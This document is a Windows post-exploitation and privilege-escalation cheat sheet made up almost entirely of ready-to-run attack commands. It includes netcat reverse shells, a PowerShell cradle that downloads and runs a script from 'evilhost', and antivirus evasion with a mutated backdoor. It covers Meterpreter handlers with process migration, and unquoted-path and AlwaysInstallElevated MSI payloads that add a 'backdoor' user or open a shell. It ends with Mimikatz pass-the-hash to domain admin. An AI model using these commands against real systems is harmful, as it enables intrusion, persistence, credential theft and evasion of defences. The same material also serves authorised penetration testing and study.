Global Tricks

# Getting shell in limited interpreter
system("start cmd.exe /k $cmd")

# Reverse shell
nc.exe attacker_ip attacker_port -e cmd.exe

# From admin to SYSTEM
psexec.exe -i -s %SystemRoot%\system32\cmd.exe

# AV Bypass
# You can generate mutated binary
hyperion.exe ../backdoor.exe ../backdoor_mutation.exe

# Download and exec powershell on target
powershell.exe "IEX (New-Object  Net.WebClient).DownloadString('http://evilhost/Malicious.ps1')"

# Payload as a trusted binary
# Copy your payload into 
# Then
%userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "whatever args"

Process Migration

# Migration can be essential to get persistence
# You might need to migrate into a classic process
msf> ps aux 
msf> migrate <pid>

# Automigrate is also sometimes needed if the shell is dying quickly
$ cat automigrate.rc
run post/windows/manage/migrate

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST xx.xx.xx.xx
msf5 exploit(multi/handler) > set LPORT 5566
msf5 exploit(multi/handler) > set AutoRunScript multi_console_command -r /path/to/automigrate.rc
msf5 exploit(multi/handler) > exploit

Folder and Files Rights

# icacls allows you to check for files and folder permissions
C:> icacls Desktop/
C:> icacls root.txt

# If you have rights on the folder but not especially on files, you can grant them
C:> icacls root.txt /grant user:F

Unquoted Paths

# Some paths are vulnerable
# It occurs because Windows will try for every whitespace, to find the binary in every intermediate folder
C:\Program Files\something\winamp.exe

# You could place your payload in
C:\Program Files.exe

# The following command will display affected services
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ rmthelastquote"

# Reverse shell
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai LHOST= LPORT=8989 -f exe -o A.exe
msf> upload -f A.exe
sc stop "Vulnerable Service"

# If can't, you can reboot
shutdown /r /t 0

# Session will die quickly, so it is necessary to automigrate
# when a service starts in Windows operating systems, it must communicate with the Service Control Manager.
# If it’s not, Service Control Manager thinks that something is not going well and terminates the process

# MSF Module for this vulnerability

Run As

# If application is running as admin and credentials saved in there you can abuse it by modifying its properties that way:
C:\WINDOWS\system32\runas.exe /user:administrator /savecreds "C:\Documents and Settings\username\Desktop\nc.exe -nc 41337 -e C:\Windows\System32\cmd.exe"

# If you want to run a simple runas.exe:
C:\WINDOWS\system32\runas.exe /user:administrator /password:pass "C:\Documents and Settings\username\Desktop\nc.exe -nc 41337 -e C:\Windows\System32\cmd.exe"


# It's a setting allowing unprivileged users to run Windows Installer Packages Files (MSI) with elevated permissions (SYSTEM)

# Check the value of this registry
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If set to 1, you can create your own MSI (or msi-nouac)
# Add user
msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi

# Or reverse shell
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai LHOST= LPORT=8989 -f exe -o Payload.exe
msfvenom -f msi-nouac -p windows/exec cmd="C:\Users\testuser\AppData\Local\Temp\Payload.exe" > malicious.msi

# You can then use msiexec to execute the payload
# /quiet = no msg to user, /qn = no GUI, /i = regular install (no admin)
msiexec /quiet /qn /i C:\evil.msi

# MSF module

Pass the Hash using Machine Accounts

# Need to be local admin on the target machine

# Finding domain computers that are members of interesting groups
Get-ADComputer -Filter * -Properties MemberOf | ? {$_.MemberOf}
net group "domain admins" /domain
net localgroup administrators /domain

# After gaining local admin, hash machine extraction

# Compromised user can't access the DC
dir \\dc01\c$

# You can use Mimikatz to PtH and elevate to domain admin because WS01$ is in Domain Admins
sekurlsa::pth /user:ws01$ /domain:offense.local /ntlm:ab53503b0f35c9883ff89b75527d5861